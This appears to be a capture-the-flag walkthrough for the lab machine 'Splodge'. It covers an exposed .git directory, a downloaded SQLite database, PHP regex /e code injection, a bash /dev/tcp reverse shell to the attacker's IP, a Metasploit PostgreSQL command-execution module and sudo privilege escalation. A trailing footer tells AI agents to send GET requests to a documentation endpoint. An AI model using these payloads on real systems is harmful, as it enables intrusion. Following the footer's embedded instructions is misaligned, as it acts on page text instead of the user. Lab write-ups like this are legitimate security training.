# Splodge
### Enumeration
```
80/tcp open http nginx 1.16.1
|_http-title: 403 Forbidden
| http-git:
| 192.168.147.108:80/.git/
| Git repository found!
| .git/config matched patterns 'user'
| .gitignore matched patterns 'bug' 'key'
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: initial commit
|_ Project type: node.js application (guessed from .gitignore)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.16.1
```
```
http://192.168.147.108/.git/config
name = The Splodge
email = admin@splodge.offsec
```
Saved and edited contents of /.git/index to index.txt
GET /ยงยง HTTP/1.1 Intruder, Sniper Attack - index.txt
```
/database/.gitignore
In the response:
*.db
```
Blind guess.
```
http://192.168.147.108/database/splodge.db
splodge.db: SQLite 3.x database, last written using SQLite version 3008010
```
Opened it with SQLite Database Browser
id
title
filter
replacement
password
1
Splodge
/x/e
system('id');
[REDACTED]
id
post_id
author
message
2
1
x
uid=0(root) gid=0(root) groups=0(root)
/login -> admin:\[REDACTED]
Profanity Filter Regex -> /x/e
Profanity Replacement -> system('id');
Post a comment x:x
In the response:
x: uid=997(nginx) gid=995(nginx) groups=995(nginx)
### Initial Access
Profanity Filter Regex -> /x/e
Profanity Replacement -> system('/bin/bash -i >& /dev/tcp/192.168.49.147/80 0>&1');
Post a comment x:x
### Lateral Movement
Enviroment Variables:
```
DB_HOST=127.0.0.1
DB_PORT=5432
APP_NAME=Splodge
USER=nginx
APP_URL=http://splodge.offsec
PATH=/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/bin
DB_CONNECTION=pgsql
DB_DATABASE=splodge
DB_PASSWORD=[REDACTED]
DB_USERNAME=postgres
HOME=/var/lib/nginx
```
```
$ ps aux | grep pgsql
thesplo+ 1023 0.0 0.9 397396 17472 ? Ss 18:26 0:00 /usr/pgsql-12/bin/postmaster -D /home/thesplodge/.pgdata
```
```
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate a
gainst
DUMP_TABLE_OUTPUT false no select payload command output
from table (For Debugging)
PASSWORD [REDACTED] no The password for the specified
username. Leave blank for a random
password.
RHOSTS 192.168.147.108 yes The target host(s), see https:
//github.com/rapid7/metasploit
-framework/wiki/Using-Metasploit
RPORT 5432 yes The target port (TCP)
TABLENAME imqV1ya2m yes A table name that does not exi
st (To avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.49.147 yes The listen address (an interface may be speci
fied)
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
```
### PrivEsc
```
[thesplodge@splodge ~]$ sudo -l
...
User thesplodge may run the following commands on splodge:
(ALL) NOPASSWD: /bin/bash
[thesplodge@splodge ~]$ sudo /bin/bash
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/splodge.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.